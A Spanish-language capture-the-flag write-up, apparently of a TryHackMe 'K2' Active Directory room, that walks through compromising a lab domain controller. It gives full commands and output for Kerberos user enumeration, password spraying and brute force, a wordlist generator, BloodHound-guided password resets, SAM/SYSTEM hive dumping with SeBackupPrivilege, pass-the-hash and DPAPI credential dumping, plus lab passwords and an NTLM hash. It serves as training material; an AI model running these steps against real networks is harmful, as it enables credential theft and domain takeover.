BlogTwitterLinkedIn

🏔️K2 - 2/3 (AD)

Use all of the information gathered from your previous findings in order to keep making your way to the top.

Enumeración de Red

nmap

autoscan 10.10.167.138

Resultado nmap

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-12 14:41:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=K2Server.k2.thm
| Not valid before: 2025-08-11T14:36:51
|_Not valid after:  2026-02-10T14:36:51
| rdp-ntlm-info: 
|   Target_Name: K2
|   NetBIOS_Domain_Name: K2
|   NetBIOS_Computer_Name: K2SERVER
|   DNS_Domain_Name: k2.thm
|   DNS_Computer_Name: K2Server.k2.thm
|   DNS_Tree_Name: k2.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2025-08-12T14:42:43+00:00
|_ssl-date: 2025-08-12T14:43:23+00:00; +1s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
9389/tcp  open  mc-nmf        .NET Message Framing
49669/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: K2SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows

  • Windows - Active Directory

  • Kerberos, smb, rpc, ldap

  • domain: k2.thm

  • computer: K2SERVER

Enumeración de Usuarios de Dominio

Username-Anarchy

LogoGitHub - urbanadventurer/username-anarchy: Username tools for penetration testingGitHub
Generar variantes de usuarios recogidos anteriormente
./username-anarchy james bold > users.txt
./username-anarchy rose bud >> users.txt

Kerbrute Userenum

kerbrute userenum --dc 10.10.167.138 -d k2.thm users.txt

[+] VALID USERNAME: [email protected] [+] VALID USERNAME: [email protected]

Password Spraying

Contraseñas recogidas anteriormente

passes.txt
james:Pwd@9tLNrC3!
rose:vRMkaVgdfxhW!8
root:RdzQ7MSKt)fNaz3!
crackmapexec smb 10.10.167.138 -u users.txt -p passes.txt

[+] k2.thm\r.bud:vRMkaVgdfxhW!8

Iniciar Sesión Remota

Comprobar permisos
netexec winrm -i 10.10.167.138 -u r.bud -p 'vRMkaVgdfxhW!8'

[+] k2.thm\r.bud:vRMkaVgdfxhW!8 (Pwn3d!)

Establecer sesión remota de windows
evil-winrm -i 10.10.167.138 -u r.bud -p 'vRMkaVgdfxhW!8'

Intrusión en el Sistema

Sesión Remota Windows: k2\r.bud

Enumeración Post-Intrusión

C:\Users\r.bud\Documents

  • notes.txt

  • note_to_james.txt

La nueva contraseña de james es 'rockyou' + número + carácter especial.

net users

Usuarios locales: j.bold, r.bud, j.smith, administrator

Script pass-gen.py

#!/usr/bin/env python3
import argparse
import itertools
import string
from pathlib import Path

def parse_args():
    p = argparse.ArgumentParser(description="Genera wordlist con dígito y caracter especial en posiciones flexibles")
    p.add_argument("--base", "-b", default="rockyou", help="Contraseña base (default: rockyou)")
    p.add_argument("--specials", "-s", default=None,
                   help="Cadena con caracteres especiales a usar (por defecto string.punctuation)")
    p.add_argument("--out", "-f", default=None, help="Archivo de salida (si se omite, solo imprime por pantalla)")
    return p.parse_args()

def main():
    args = parse_args()
    base = args.base
    digits = "0123456789"
    specials = args.specials if args.specials is not None else string.punctuation

    combos = []

    # 1. Ambos al final
    for d, s in itertools.product(digits, specials):
        combos.append(base + d + s)
    for s, d in itertools.product(specials, digits):
        combos.append(base + s + d)

    # 2. Ambos al principio
    for d, s in itertools.product(digits, specials):
        combos.append(d + s + base)
    for s, d in itertools.product(specials, digits):
        combos.append(s + d + base)

    # 3. Dígito al principio, especial al final
    for d, s in itertools.product(digits, specials):
        combos.append(d + base + s)

    # 4. Especial al principio, dígito al final
    for s, d in itertools.product(specials, digits):
        combos.append(s + base + d)

    # Quitar duplicados
    seen = set()
    unique = []
    for w in combos:
        if w not in seen:
            seen.add(w)
            unique.append(w)

    # Imprimir siempre por pantalla
    for w in unique:
        print(w)
    print(f"# Total: {len(unique)}")

    # Guardar en archivo si se pidió
    if args.out:
        out_path = Path(args.out)
        with out_path.open("w", encoding="utf-8", newline="\n") as fh:
            for w in unique:
                fh.write(w + "\n")
        print(f"[+] Guardado en: {out_path}")

if __name__ == "__main__":
    main()

Generar wordlist passes.txt

python3 pass-gen.py --out passes.txt

Kerbrute Password Bruteforce

kerbrute bruteuser --dc 10.10.167.138 -d k2.thm passes.txt j.bold

[+] VALID LOGIN: [email protected]:#8rockyou

Enumeración Autenticada de Dominio

Recolección

bloodhound-python -u r.bud -p 'vRMkaVgdfxhW!8' -d k2.thm -ns 10.10.167.138 -c All --zip

Info BloodHound

[email protected]MemberOf → IT STAFF 1 → GenericAll[email protected] (Domain Admin)

  • GenericAll == ForceChangePassword

Explotación: ForceChangePassword

net rpc password "j.smith" "Pass123" -U "K2.THM"/"j.bold"%"#8rockyou" -S "10.10.167.138"
Comprobar cambio
netexec winrm K2SERVER.k2.thm -u j.smith -p 'Pass123'

[+] k2.thm\j.smith:Pass123 (Pwn3d!)

evil-winrm -i 10.10.167.138 -u j.smith -p 'Pass123'

Escalada de Privilegios

Sesión Remota Windows: k2\j.smith

Enumeración Post-Escalada

Comprobar permisos
whoami /priv
SeBackupPrivilege     |    Back up files and directories  |    Enabled
SeRestorePrivilege    |    Restore files and directories  |    Enabled

SAM/SYSTEM Backup + Pass the Hash Attack

Escalada de Privilegios: SAM/SYSTEM Backup + PtH Attack

backup sam + system
reg save hklm\system C:\Users\j.smith\temp\system.hive
reg save hklm\sam C:\Users\j.smith\temp\sam.hive
Descarga directa por evilwinrm
download system.hive
download sam.hive
Extraer hashes NTLM
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Iniciar sesión remota con admin hash
evil-winrm -i 10.10.167.138 -u administrator -H '9545b61858c043477c350ae86c37b32f'
Volcar contraseña de administrador
netexec smb K2SERVER.k2.thm -u administrator -H '9545b61858c043477c350ae86c37b32f' --dpapi

K2\Administrator:vz0q$i8b4c

Compromiso del Sistema

Sesión Windows Remota: k2\administrator

Última actualización